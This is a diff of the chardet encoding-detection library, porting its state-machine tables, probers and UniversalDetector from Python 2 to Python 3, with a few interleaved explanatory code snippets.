0,0,0,0,0,0,0,0, # c8 - cf
0,0,0,0,0,0,0,0, # d0 - d7
0,0,0,0,0,0,0,0, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,4,5 # f8 - ff
)
UCS2BE_st = ( \
5, 7, 7,eError, 4, 3,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe, 6, 6, 6, 6,eError,eError,#10-17
6, 6, 6, 6, 6,eItsMe, 6, 6,#18-1f
6, 6, 6, 6, 5, 7, 7,eError,#20-27
5, 8, 6, 6,eError, 6, 6, 6,#28-2f
6, 6, 6, 6,eError,eError,eStart,eStart)#30-37
UCS2BE_st = (
5, 7, 7,eError, 4, 3,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe, 6, 6, 6, 6,eError,eError,#10-17
6, 6, 6, 6, 6,eItsMe, 6, 6,#18-1f
6, 6, 6, 6, 5, 7, 7,eError,#20-27
5, 8, 6, 6,eError, 6, 6, 6,#28-2f
6, 6, 6, 6,eError,eError,eStart,eStart #30-37
)
UCS2BECharLenTable = (2, 2, 2, 0, 2, 2)
@ -390,48 +444,50 @@ UCS2BESMModel = {'classTable': UCS2BE_cls,
# UCS2-LE
UCS2LE_cls = ( \
0,0,0,0,0,0,0,0, # 00 - 07
0,0,1,0,0,2,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,3,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,3,3,3,3,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,0,0,0,0,0,0,0, # a0 - a7
0,0,0,0,0,0,0,0, # a8 - af
0,0,0,0,0,0,0,0, # b0 - b7
0,0,0,0,0,0,0,0, # b8 - bf
0,0,0,0,0,0,0,0, # c0 - c7
0,0,0,0,0,0,0,0, # c8 - cf
0,0,0,0,0,0,0,0, # d0 - d7
0,0,0,0,0,0,0,0, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,4,5) # f8 - ff
UCS2LE_cls = (
0,0,0,0,0,0,0,0, # 00 - 07
0,0,1,0,0,2,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,3,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,3,3,3,3,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,0,0,0,0,0,0,0, # a0 - a7
0,0,0,0,0,0,0,0, # a8 - af
0,0,0,0,0,0,0,0, # b0 - b7
0,0,0,0,0,0,0,0, # b8 - bf
0,0,0,0,0,0,0,0, # c0 - c7
0,0,0,0,0,0,0,0, # c8 - cf
0,0,0,0,0,0,0,0, # d0 - d7
0,0,0,0,0,0,0,0, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,4,5 # f8 - ff
)
UCS2LE_st = ( \
6, 6, 7, 6, 4, 3,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe, 5, 5, 5,eError,eItsMe,eError,#10-17
5, 5, 5,eError, 5,eError, 6, 6,#18-1f
7, 6, 8, 8, 5, 5, 5,eError,#20-27
5, 5, 5,eError,eError,eError, 5, 5,#28-2f
5, 5, 5,eError, 5,eError,eStart,eStart)#30-37
UCS2LE_st = (
6, 6, 7, 6, 4, 3,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe, 5, 5, 5,eError,eItsMe,eError,#10-17
5, 5, 5,eError, 5,eError, 6, 6,#18-1f
7, 6, 8, 8, 5, 5, 5,eError,#20-27
5, 5, 5,eError,eError,eError, 5, 5,#28-2f
5, 5, 5,eError, 5,eError,eStart,eStart #30-37
)
UCS2LECharLenTable = (2, 2, 2, 2, 2, 2)
@ -443,67 +499,69 @@ UCS2LESMModel = {'classTable': UCS2LE_cls,
# UTF-8
UTF8_cls = ( \
UTF8_cls = (
1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as a legal value
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
1,1,1,1,1,1,1,1, # 40 - 47
1,1,1,1,1,1,1,1, # 48 - 4f
1,1,1,1,1,1,1,1, # 50 - 57
1,1,1,1,1,1,1,1, # 58 - 5f
1,1,1,1,1,1,1,1, # 60 - 67
1,1,1,1,1,1,1,1, # 68 - 6f
1,1,1,1,1,1,1,1, # 70 - 77
1,1,1,1,1,1,1,1, # 78 - 7f
2,2,2,2,3,3,3,3, # 80 - 87
4,4,4,4,4,4,4,4, # 88 - 8f
4,4,4,4,4,4,4,4, # 90 - 97
4,4,4,4,4,4,4,4, # 98 - 9f
5,5,5,5,5,5,5,5, # a0 - a7
5,5,5,5,5,5,5,5, # a8 - af
5,5,5,5,5,5,5,5, # b0 - b7
5,5,5,5,5,5,5,5, # b8 - bf
0,0,6,6,6,6,6,6, # c0 - c7
6,6,6,6,6,6,6,6, # c8 - cf
6,6,6,6,6,6,6,6, # d0 - d7
6,6,6,6,6,6,6,6, # d8 - df
7,8,8,8,8,8,8,8, # e0 - e7
8,8,8,8,8,9,8,8, # e8 - ef
10,11,11,11,11,11,11,11, # f0 - f7
12,13,13,13,14,15,0,0) # f8 - ff
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
1,1,1,1,1,1,1,1, # 40 - 47
1,1,1,1,1,1,1,1, # 48 - 4f
1,1,1,1,1,1,1,1, # 50 - 57
1,1,1,1,1,1,1,1, # 58 - 5f
1,1,1,1,1,1,1,1, # 60 - 67
1,1,1,1,1,1,1,1, # 68 - 6f
1,1,1,1,1,1,1,1, # 70 - 77
1,1,1,1,1,1,1,1, # 78 - 7f
2,2,2,2,3,3,3,3, # 80 - 87
4,4,4,4,4,4,4,4, # 88 - 8f
4,4,4,4,4,4,4,4, # 90 - 97
4,4,4,4,4,4,4,4, # 98 - 9f
5,5,5,5,5,5,5,5, # a0 - a7
5,5,5,5,5,5,5,5, # a8 - af
5,5,5,5,5,5,5,5, # b0 - b7
5,5,5,5,5,5,5,5, # b8 - bf
0,0,6,6,6,6,6,6, # c0 - c7
6,6,6,6,6,6,6,6, # c8 - cf
6,6,6,6,6,6,6,6, # d0 - d7
6,6,6,6,6,6,6,6, # d8 - df
7,8,8,8,8,8,8,8, # e0 - e7
8,8,8,8,8,9,8,8, # e8 - ef
10,11,11,11,11,11,11,11, # f0 - f7
12,13,13,13,14,15,0,0 # f8 - ff
)
UTF8_st = ( \
eError,eStart,eError,eError,eError,eError, 12, 10,#00-07
9, 11, 8, 7, 6, 5, 4, 3,#08-0f
eError,eError,eError,eError,eError,eError,eError,eError,#10-17
eError,eError,eError,eError,eError,eError,eError,eError,#18-1f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#20-27
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#28-2f
eError,eError, 5, 5, 5, 5,eError,eError,#30-37
eError,eError,eError,eError,eError,eError,eError,eError,#38-3f
eError,eError,eError, 5, 5, 5,eError,eError,#40-47
eError,eError,eError,eError,eError,eError,eError,eError,#48-4f
eError,eError, 7, 7, 7, 7,eError,eError,#50-57
eError,eError,eError,eError,eError,eError,eError,eError,#58-5f
eError,eError,eError,eError, 7, 7,eError,eError,#60-67
eError,eError,eError,eError,eError,eError,eError,eError,#68-6f
eError,eError, 9, 9, 9, 9,eError,eError,#70-77
eError,eError,eError,eError,eError,eError,eError,eError,#78-7f
eError,eError,eError,eError,eError, 9,eError,eError,#80-87
eError,eError,eError,eError,eError,eError,eError,eError,#88-8f
eError,eError, 12, 12, 12, 12,eError,eError,#90-97
eError,eError,eError,eError,eError,eError,eError,eError,#98-9f
eError,eError,eError,eError,eError, 12,eError,eError,#a0-a7
eError,eError,eError,eError,eError,eError,eError,eError,#a8-af
eError,eError, 12, 12, 12,eError,eError,eError,#b0-b7
eError,eError,eError,eError,eError,eError,eError,eError,#b8-bf
eError,eError,eStart,eStart,eStart,eStart,eError,eError,#c0-c7
eError,eError,eError,eError,eError,eError,eError,eError)#c8-cf
UTF8_st = (
eError,eStart,eError,eError,eError,eError, 12, 10,#00-07
9, 11, 8, 7, 6, 5, 4, 3,#08-0f
eError,eError,eError,eError,eError,eError,eError,eError,#10-17
eError,eError,eError,eError,eError,eError,eError,eError,#18-1f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#20-27
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#28-2f
eError,eError, 5, 5, 5, 5,eError,eError,#30-37
eError,eError,eError,eError,eError,eError,eError,eError,#38-3f
eError,eError,eError, 5, 5, 5,eError,eError,#40-47
eError,eError,eError,eError,eError,eError,eError,eError,#48-4f
eError,eError, 7, 7, 7, 7,eError,eError,#50-57
eError,eError,eError,eError,eError,eError,eError,eError,#58-5f
eError,eError,eError,eError, 7, 7,eError,eError,#60-67
eError,eError,eError,eError,eError,eError,eError,eError,#68-6f
eError,eError, 9, 9, 9, 9,eError,eError,#70-77
eError,eError,eError,eError,eError,eError,eError,eError,#78-7f
eError,eError,eError,eError,eError, 9,eError,eError,#80-87
eError,eError,eError,eError,eError,eError,eError,eError,#88-8f
eError,eError, 12, 12, 12, 12,eError,eError,#90-97
eError,eError,eError,eError,eError,eError,eError,eError,#98-9f
eError,eError,eError,eError,eError, 12,eError,eError,#a0-a7
eError,eError,eError,eError,eError,eError,eError,eError,#a8-af
eError,eError, 12, 12, 12,eError,eError,eError,#b0-b7
eError,eError,eError,eError,eError,eError,eError,eError,#b8-bf
eError,eError,eStart,eStart,eStart,eStart,eError,eError,#c0-c7
eError,eError,eError,eError,eError,eError,eError,eError #c8-cf
)
UTF8CharLenTable = (0, 1, 0, 0, 0, 0, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6)

View File

@ -14,20 +14,22 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from charsetprober import CharSetProber
import sys
from . import constants
from .charsetprober import CharSetProber
from .compat import wrap_ord
SAMPLE_SIZE = 64
SB_ENOUGH_REL_THRESHOLD = 1024
@ -38,21 +40,26 @@ NUMBER_OF_SEQ_CAT = 4
POSITIVE_CAT = NUMBER_OF_SEQ_CAT - 1
#NEGATIVE_CAT = 0
class SingleByteCharSetProber(CharSetProber):
def __init__(self, model, reversed=constants.False, nameProber=None):
def __init__(self, model, reversed=False, nameProber=None):
CharSetProber.__init__(self)
self._mModel = model
self._mReversed = reversed # TRUE if we need to reverse every pair in the model lookup
self._mNameProber = nameProber # Optional auxiliary prober for name decision
# TRUE if we need to reverse every pair in the model lookup
self._mReversed = reversed
# Optional auxiliary prober for name decision
self._mNameProber = nameProber
self.reset()
def reset(self):
CharSetProber.reset(self)
self._mLastOrder = 255 # char order of last character
# char order of last character
self._mLastOrder = 255
self._mSeqCounters = [0] * NUMBER_OF_SEQ_CAT
self._mTotalSeqs = 0
self._mTotalChar = 0
self._mFreqChar = 0 # characters that fall in our sampling range
# characters that fall in our sampling range
self._mFreqChar = 0
def get_charset_name(self):
if self._mNameProber:
@ -67,7 +74,7 @@ class SingleByteCharSetProber(CharSetProber):
if not aLen:
return self.get_state()
for c in aBuf:
order = self._mModel['charToOrderMap'][ord(c)]
order = self._mModel['charToOrderMap'][wrap_ord(c)]
if order < SYMBOL_CAT_ORDER:
self._mTotalChar += 1
if order < SAMPLE_SIZE:
@ -75,9 +82,12 @@ class SingleByteCharSetProber(CharSetProber):
if self._mLastOrder < SAMPLE_SIZE:
self._mTotalSeqs += 1
if not self._mReversed:
self._mSeqCounters[self._mModel['precedenceMatrix'][(self._mLastOrder * SAMPLE_SIZE) + order]] += 1
else: # reverse the order of the letters in the lookup
self._mSeqCounters[self._mModel['precedenceMatrix'][(order * SAMPLE_SIZE) + self._mLastOrder]] += 1
i = (self._mLastOrder * SAMPLE_SIZE) + order
model = self._mModel['precedenceMatrix'][i]
else: # reverse the order of the letters in the lookup
i = (order * SAMPLE_SIZE) + self._mLastOrder
model = self._mModel['precedenceMatrix'][i]
self._mSeqCounters[model] += 1
self._mLastOrder = order
if self.get_state() == constants.eDetecting:
@ -85,11 +95,16 @@ class SingleByteCharSetProber(CharSetProber):
cf = self.get_confidence()
if cf > POSITIVE_SHORTCUT_THRESHOLD:
if constants._debug:
sys.stderr.write('%s confidence = %s, we have a winner\n' % (self._mModel['charsetName'], cf))
sys.stderr.write('%s confidence = %s, we have a '
'winner\n' %
(self._mModel['charsetName'], cf))
self._mState = constants.eFoundIt
elif cf < NEGATIVE_SHORTCUT_THRESHOLD:
if constants._debug:
sys.stderr.write('%s confidence = %s, below negative shortcut threshhold %s\n' % (self._mModel['charsetName'], cf, NEGATIVE_SHORTCUT_THRESHOLD))
sys.stderr.write('%s confidence = %s, below negative '
'shortcut threshhold %s\n' %
(self._mModel['charsetName'], cf,
NEGATIVE_SHORTCUT_THRESHOLD))
self._mState = constants.eNotMe
return self.get_state()
@ -97,9 +112,8 @@ class SingleByteCharSetProber(CharSetProber):
def get_confidence(self):
r = 0.01
if self._mTotalSeqs > 0:
# print self._mSeqCounters[POSITIVE_CAT], self._mTotalSeqs, self._mModel['mTypicalPositiveRatio']
r = (1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs / self._mModel['mTypicalPositiveRatio']
# print r, self._mFreqChar, self._mTotalChar
r = ((1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs
/ self._mModel['mTypicalPositiveRatio'])
r = r * self._mFreqChar / self._mTotalChar
if r >= 1.0:
r = 0.99
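The confidence computed above is the fraction of observed character pairs landing in the most positive sequence category, normalised by the model's mTypicalPositiveRatio and scaled by the share of characters that fell inside the sampling range, capped at 0.99. A quick worked example with made-up counts (the numbers are illustrative, not taken from any shipped model):

# Hypothetical counts for illustration only.
positive_seqs, total_seqs = 430, 600     # pairs in the top category vs. all pairs
typical_positive_ratio = 0.95            # model constant (mTypicalPositiveRatio)
freq_char, total_char = 900, 1000        # sampled characters vs. all characters

r = (1.0 * positive_seqs) / total_seqs / typical_positive_ratio
r = r * freq_char / total_char
r = min(r, 0.99)                         # same cap as the prober applies
print(round(r, 3))                       # -> 0.679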

View File

@ -14,33 +14,35 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from charsetgroupprober import CharSetGroupProber
from sbcharsetprober import SingleByteCharSetProber
from langcyrillicmodel import Win1251CyrillicModel, Koi8rModel, Latin5CyrillicModel, MacCyrillicModel, Ibm866Model, Ibm855Model
from langgreekmodel import Latin7GreekModel, Win1253GreekModel
from langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel
from langhungarianmodel import Latin2HungarianModel, Win1250HungarianModel
from langthaimodel import TIS620ThaiModel
from langhebrewmodel import Win1255HebrewModel
from hebrewprober import HebrewProber
from .charsetgroupprober import CharSetGroupProber
from .sbcharsetprober import SingleByteCharSetProber
from .langcyrillicmodel import (Win1251CyrillicModel, Koi8rModel,
Latin5CyrillicModel, MacCyrillicModel,
Ibm866Model, Ibm855Model)
from .langgreekmodel import Latin7GreekModel, Win1253GreekModel
from .langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel
from .langhungarianmodel import Latin2HungarianModel, Win1250HungarianModel
from .langthaimodel import TIS620ThaiModel
from .langhebrewmodel import Win1255HebrewModel
from .hebrewprober import HebrewProber
class SBCSGroupProber(CharSetGroupProber):
def __init__(self):
CharSetGroupProber.__init__(self)
self._mProbers = [ \
self._mProbers = [
SingleByteCharSetProber(Win1251CyrillicModel),
SingleByteCharSetProber(Koi8rModel),
SingleByteCharSetProber(Latin5CyrillicModel),
@ -54,11 +56,14 @@ class SBCSGroupProber(CharSetGroupProber):
SingleByteCharSetProber(Latin2HungarianModel),
SingleByteCharSetProber(Win1250HungarianModel),
SingleByteCharSetProber(TIS620ThaiModel),
]
]
hebrewProber = HebrewProber()
logicalHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, constants.False, hebrewProber)
visualHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, constants.True, hebrewProber)
logicalHebrewProber = SingleByteCharSetProber(Win1255HebrewModel,
False, hebrewProber)
visualHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, True,
hebrewProber)
hebrewProber.set_model_probers(logicalHebrewProber, visualHebrewProber)
self._mProbers.extend([hebrewProber, logicalHebrewProber, visualHebrewProber])
self._mProbers.extend([hebrewProber, logicalHebrewProber,
visualHebrewProber])
self.reset()

View File

@ -13,25 +13,26 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from mbcharsetprober import MultiByteCharSetProber
from codingstatemachine import CodingStateMachine
from chardistribution import SJISDistributionAnalysis
from jpcntx import SJISContextAnalysis
from mbcssm import SJISSMModel
import constants, sys
from constants import eStart, eError, eItsMe
import sys
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import SJISDistributionAnalysis
from .jpcntx import SJISContextAnalysis
from .mbcssm import SJISSMModel
from . import constants
class SJISProber(MultiByteCharSetProber):
def __init__(self):
@ -46,35 +47,40 @@ class SJISProber(MultiByteCharSetProber):
self._mContextAnalyzer.reset()
def get_charset_name(self):
return "SHIFT_JIS"
return self._mContextAnalyzer.get_charset_name()
def feed(self, aBuf):
aLen = len(aBuf)
for i in xrange(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == eError:
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n')
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == eItsMe:
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == eStart:
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mContextAnalyzer.feed(self._mLastChar[2 - charLen :], charLen)
self._mContextAnalyzer.feed(self._mLastChar[2 - charLen:],
charLen)
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mContextAnalyzer.feed(aBuf[i + 1 - charLen : i + 3 - charLen], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1 : i + 1], charLen)
self._mContextAnalyzer.feed(aBuf[i + 1 - charLen:i + 3
- charLen], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if self._mContextAnalyzer.got_enough_data() and \
(self.get_confidence() > constants.SHORTCUT_THRESHOLD):
if (self._mContextAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()

View File

@ -1,20 +0,0 @@
import sys, glob
sys.path.insert(0, '..')
from chardet.universaldetector import UniversalDetector
count = 0
u = UniversalDetector()
for f in glob.glob(sys.argv[1]):
print f.ljust(60),
u.reset()
for line in file(f, 'rb'):
u.feed(line)
if u.done: break
u.close()
result = u.result
if result['encoding']:
print result['encoding'], 'with confidence', result['confidence']
else:
print '******** no result'
count += 1
print count, 'tests'
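The removed helper above is Python 2 only (print statements, file()); a roughly equivalent Python 3 sketch of the same loop, assuming chardet is importable on sys.path, would be:

import glob
import sys

from chardet.universaldetector import UniversalDetector

count = 0
detector = UniversalDetector()
for name in glob.glob(sys.argv[1]):
    detector.reset()
    with open(name, "rb") as handle:          # feed raw bytes, not decoded text
        for line in handle:
            detector.feed(line)
            if detector.done:
                break
    detector.close()
    result = detector.result
    if result["encoding"]:
        print("%-60s %s with confidence %s" % (name, result["encoding"], result["confidence"]))
    else:
        print("%-60s ******** no result" % name)
    count += 1
print(count, "tests")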

View File

@ -14,23 +14,25 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from latin1prober import Latin1Prober # windows-1252
from mbcsgroupprober import MBCSGroupProber # multi-byte character sets
from sbcsgroupprober import SBCSGroupProber # single-byte character sets
from escprober import EscCharSetProber # ISO-2122, etc.
from . import constants
import sys
import codecs
from .latin1prober import Latin1Prober # windows-1252
from .mbcsgroupprober import MBCSGroupProber # multi-byte character sets
from .sbcsgroupprober import SBCSGroupProber # single-byte character sets
from .escprober import EscCharSetProber # ISO-2122, etc.
import re
MINIMUM_THRESHOLD = 0.20
@ -38,68 +40,78 @@ ePureAscii = 0
eEscAscii = 1
eHighbyte = 2
class UniversalDetector:
def __init__(self):
self._highBitDetector = re.compile(r'[\x80-\xFF]')
self._escDetector = re.compile(r'(\033|~{)')
self._highBitDetector = re.compile(b'[\x80-\xFF]')
self._escDetector = re.compile(b'(\033|~{)')
self._mEscCharSetProber = None
self._mCharSetProbers = []
self.reset()
def reset(self):
self.result = {'encoding': None, 'confidence': 0.0}
self.done = constants.False
self._mStart = constants.True
self._mGotData = constants.False
self.done = False
self._mStart = True
self._mGotData = False
self._mInputState = ePureAscii
self._mLastChar = ''
self._mLastChar = b''
if self._mEscCharSetProber:
self._mEscCharSetProber.reset()
for prober in self._mCharSetProbers:
prober.reset()
def feed(self, aBuf):
if self.done: return
if self.done:
return
aLen = len(aBuf)
if not aLen: return
if not aLen:
return
if not self._mGotData:
# If the data starts with BOM, we know it is UTF
if aBuf[:3] == '\xEF\xBB\xBF':
if aBuf[:3] == codecs.BOM_UTF8:
# EF BB BF UTF-8 with BOM
self.result = {'encoding': "UTF-8", 'confidence': 1.0}
elif aBuf[:4] == '\xFF\xFE\x00\x00':
self.result = {'encoding': "UTF-8-SIG", 'confidence': 1.0}
elif aBuf[:4] == codecs.BOM_UTF32_LE:
# FF FE 00 00 UTF-32, little-endian BOM
self.result = {'encoding': "UTF-32LE", 'confidence': 1.0}
elif aBuf[:4] == '\x00\x00\xFE\xFF':
elif aBuf[:4] == codecs.BOM_UTF32_BE:
# 00 00 FE FF UTF-32, big-endian BOM
self.result = {'encoding': "UTF-32BE", 'confidence': 1.0}
elif aBuf[:4] == '\xFE\xFF\x00\x00':
elif aBuf[:4] == b'\xFE\xFF\x00\x00':
# FE FF 00 00 UCS-4, unusual octet order BOM (3412)
self.result = {'encoding': "X-ISO-10646-UCS-4-3412", 'confidence': 1.0}
elif aBuf[:4] == '\x00\x00\xFF\xFE':
self.result = {
'encoding': "X-ISO-10646-UCS-4-3412",
'confidence': 1.0
}
elif aBuf[:4] == b'\x00\x00\xFF\xFE':
# 00 00 FF FE UCS-4, unusual octet order BOM (2143)
self.result = {'encoding': "X-ISO-10646-UCS-4-2143", 'confidence': 1.0}
elif aBuf[:2] == '\xFF\xFE':
self.result = {
'encoding': "X-ISO-10646-UCS-4-2143",
'confidence': 1.0
}
elif aBuf[:2] == codecs.BOM_LE:
# FF FE UTF-16, little endian BOM
self.result = {'encoding': "UTF-16LE", 'confidence': 1.0}
elif aBuf[:2] == '\xFE\xFF':
elif aBuf[:2] == codecs.BOM_BE:
# FE FF UTF-16, big endian BOM
self.result = {'encoding': "UTF-16BE", 'confidence': 1.0}
self._mGotData = constants.True
self._mGotData = True
if self.result['encoding'] and (self.result['confidence'] > 0.0):
self.done = constants.True
self.done = True
return
if self._mInputState == ePureAscii:
if self._highBitDetector.search(aBuf):
self._mInputState = eHighbyte
elif (self._mInputState == ePureAscii) and self._escDetector.search(self._mLastChar + aBuf):
elif ((self._mInputState == ePureAscii) and
self._escDetector.search(self._mLastChar + aBuf)):
self._mInputState = eEscAscii
self._mLastChar = aBuf[-1]
self._mLastChar = aBuf[-1:]
if self._mInputState == eEscAscii:
if not self._mEscCharSetProber:
@ -107,24 +119,26 @@ class UniversalDetector:
if self._mEscCharSetProber.feed(aBuf) == constants.eFoundIt:
self.result = {'encoding': self._mEscCharSetProber.get_charset_name(),
'confidence': self._mEscCharSetProber.get_confidence()}
self.done = constants.True
self.done = True
elif self._mInputState == eHighbyte:
if not self._mCharSetProbers:
self._mCharSetProbers = [MBCSGroupProber(), SBCSGroupProber(), Latin1Prober()]
self._mCharSetProbers = [MBCSGroupProber(), SBCSGroupProber(),
Latin1Prober()]
for prober in self._mCharSetProbers:
if prober.feed(aBuf) == constants.eFoundIt:
self.result = {'encoding': prober.get_charset_name(),
'confidence': prober.get_confidence()}
self.done = constants.True
self.done = True
break
def close(self):
if self.done: return
if self.done:
return
if not self._mGotData:
if constants._debug:
sys.stderr.write('no data received!\n')
return
self.done = constants.True
self.done = True
if self._mInputState == ePureAscii:
self.result = {'encoding': 'ascii', 'confidence': 1.0}
@ -135,7 +149,8 @@ class UniversalDetector:
maxProberConfidence = 0.0
maxProber = None
for prober in self._mCharSetProbers:
if not prober: continue
if not prober:
continue
proberConfidence = prober.get_confidence()
if proberConfidence > maxProberConfidence:
maxProberConfidence = proberConfidence
@ -148,7 +163,8 @@ class UniversalDetector:
if constants._debug:
sys.stderr.write('no probers hit minimum threshhold\n')
for prober in self._mCharSetProbers[0].mProbers:
if not prober: continue
sys.stderr.write('%s confidence = %s\n' % \
(prober.get_charset_name(), \
if not prober:
continue
sys.stderr.write('%s confidence = %s\n' %
(prober.get_charset_name(),
prober.get_confidence()))
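The rewritten BOM handling in the UniversalDetector changes above compares the head of the buffer against the codecs.BOM_* constants instead of hand-written string literals, which keeps the comparisons working on bytes under both Python 2 and 3. The same check, pulled out into a standalone sketch (a hypothetical helper, not part of chardet's API):

import codecs

def sniff_bom(data):
    """Return an encoding name if data starts with a known BOM, else None."""
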